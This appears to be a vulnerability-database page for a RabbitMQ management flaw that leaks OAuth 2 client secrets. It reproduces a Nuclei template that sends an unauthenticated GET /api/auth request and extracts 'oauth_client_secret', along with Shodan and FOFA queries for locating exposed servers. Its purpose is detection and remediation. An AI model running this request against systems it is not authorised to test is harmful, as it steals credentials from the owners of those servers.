RabbitMQ Management - OAuth 2 Client Secret Disclosure
| Reporter | Title | Published | Views | Family All 27 |
|---|---|---|---|---|
| CVE-2026-57219 | 10 Jul 202620:22 | – | attackerkb | |
| CVE-2026-57219 affecting package rabbitmq-server for versions less than 3.13.7-7 | 22 Jul 202622:06 | – | cbl_mariner | |
| CVE-2026-57219 | 11 Jul 202602:34 | – | circl | |
| CVE-2026-57219 | 10 Jul 202620:22 | – | cve | |
| CVE-2026-57219 RabbitMQ: Unauthenticated disclosure of OAuth client credentials via an HTTP API endpoint with certain less common OAuth 2 configurations | 10 Jul 202620:22 | – | cvelist | |
| CVE-2026-57219 | 10 Jul 202620:22 | – | debiancve | |
| EUVD-2026-43021 | 10 Jul 202620:22 | – | euvd | |
| [SECURITY] Fedora 43 Update: rabbitmq-server-4.0.9-5.fc43 | 8 Aug 202601:28 | – | fedora | |
| Fedora 43 : rabbitmq-server (2026-548235ea3b) | 8 Aug 202600:00 | – | nessus | |
| RabbitMQ 3.13.x < 3.13.15 / 4.0.x < 4.0.20 / 4.1.x < 4.1.11 / 4.2.x < 4.2.6 Multiple Vulnerabilities | 17 Jul 202600:00 | – | nessus |
10
id: CVE-2026-57219
info:
name: RabbitMQ Management - OAuth 2 Client Secret Disclosure
author: aryu-ru
severity: high
description: |
RabbitMQ < 3.13.15, 4.0.20, 4.1.11, and 4.2.6 contains an information disclosure caused by the obsolete GET /api/auth endpoint exposing OAuth 2 client secrets when management.oauth_client_secret is configured, letting unauthenticated attackers access sensitive credentials, exploit requires management plugin and OAuth configuration enabled.
impact: |
Unauthenticated attackers can access OAuth 2 client secrets, leading to credential exposure and potential unauthorized access.
remediation: |
Update to versions 3.13.15, 4.0.20, 4.1.11, or 4.2.6 or later.
reference:
- https://github.com/rabbitmq/rabbitmq-server/security/advisories/GHSA-pj24-8j6m-vq9q
- https://github.com/rabbitmq/rabbitmq-server/commit/98b1daf740237c85941e8addcbea6e74f4a2743c
- https://nvd.nist.gov/vuln/detail/CVE-2026-57219
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2026-57219
epss-score: 0.00784
epss-percentile: 0.53278
cwe-id: CWE-522
metadata:
verified: true
max-request: 1
vendor: broadcom
product: rabbitmq_server
shodan-query: http.title:"RabbitMQ Management"
fofa-query: title="RabbitMQ Management"
tags: cve,cve2026,rabbitmq,broadcom,oauth,exposure,unauth
http:
- raw:
- |
GET /api/auth HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(content_type, "application/json")
- contains_all(body, "oauth_enabled", "oauth_client_secret")
condition: and
extractors:
- type: json
part: body
json:
- '.oauth_client_secret'
# digest: 4a0a004730450220490b87df5d53722899526fd40a110ad37572f3b5bce5983027234a46f1babd51022100c8835d8e586453ca32ce08e65d987d7abf67878080c83591a8b350092114a3b8:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Aug 2026 05:51Current
5.5Medium risk
Vulners AI Score5.5
CVSS 3.17.5
CVSS 48.7
EPSS0.00784
SSVC